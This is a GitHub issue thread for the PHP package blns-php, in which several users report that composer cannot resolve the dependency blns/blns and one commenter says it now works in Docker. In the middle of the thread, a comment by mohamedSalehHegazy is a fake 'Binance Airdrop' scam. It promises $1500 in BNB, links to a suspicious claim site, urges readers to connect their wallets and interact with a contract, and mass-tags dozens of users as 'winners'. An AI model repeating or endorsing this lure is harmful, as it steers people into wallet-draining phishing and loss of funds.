### ISSUE TITLE
blns/blns could not be found

### ISSUE THREAD

**Issue by tkoop** [mattsparks/blns-php#2]
I tried to install this with composer, and it complained that the package blns/blns could not be found.

Also, on your packagist page at https://packagist.org/packages/mattsparks/blns-php#v1.0.1, the link to blns/blns is not clickable, indicating that it doesn't exist.

**Comment by laxmariappan** [comment]
Any update on this? Unable to install via composer

Problem 1
    - mattsparks/blns-php v1.0.1 requires blns/blns * -> no matching package found.
    - mattsparks/blns-php v1.0.0 requires blns/blns * -> no matching package found.
    - Installation request for mattsparks/blns-php ^1.0 -> satisfiable by mattsparks/blns-php[v1.0.0, v1.0.1].

**Comment by gander** [comment]
Still not working.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @jungai, @ronwoch, @Jamewood, @elizabethtl, @rawchen, @falluk, @race, @nickthegroot, @nelsonroque, @4cm4k1, @jianyuan, @emarino135, @socopoko, @Blinc13, @cauliyang, @secobi, @vaporwavie, @LinuxTheMan, @Yeh-Chi-Chun, @MrShameer, @crzypatchwork, @roth1002, @Drewsapple, @dinu, @moeinalmasi, @metaspartan, @ryanwong1999, @chriscorrales, @stapler117, @kuaikuaikim, @matthope1, @Antogome, @brunocasamassa, @alexpozdnyakof, @imollov, @aminsource, @colemalphrus, @Ieooo, @timothysch, @mh-salmani, @bilalZOUHAIDI, @alik81, @reuixiy, @endigo, @sysr-q, @thyngontran, @YICHENG104782646, @dambor, @Y0ung-DST, @Decicus

**Comment by mariuscucuruz** [comment]
I've tested the issues raised here in a Docker container running PHP v8.2, targeting [`mattsparks/blns-php`](https://github.com/mattsparks/blns-php) both `v1.0.1` and `v1.0.0` (as well as the `*` wildcard), and found no issues. Thus I can confidently say the issue has been fixed.

Anyone wanting to see how I've done it, feel free to [check out my repo](https://github.com/mariuscucuruz/blns-php-docker) (there's also a step-by-step 'ish guide you can follow).

**Comment by kuaikuaikim** [comment]
这是来自QQ邮箱的假期自动回复邮件。你好，我最近正在休假中，无法亲自回复你的邮件。我将在假期结束后，尽快给你回复。

**Comment by MBrwr** [comment]
Just tried to install the package, blns/blns is indeed still missing

**Comment by kuaikuaikim** [comment]
这是来自QQ邮箱的假期自动回复邮件。你好，我最近正在休假中，无法亲自回复你的邮件。我将在假期结束后，尽快给你回复。
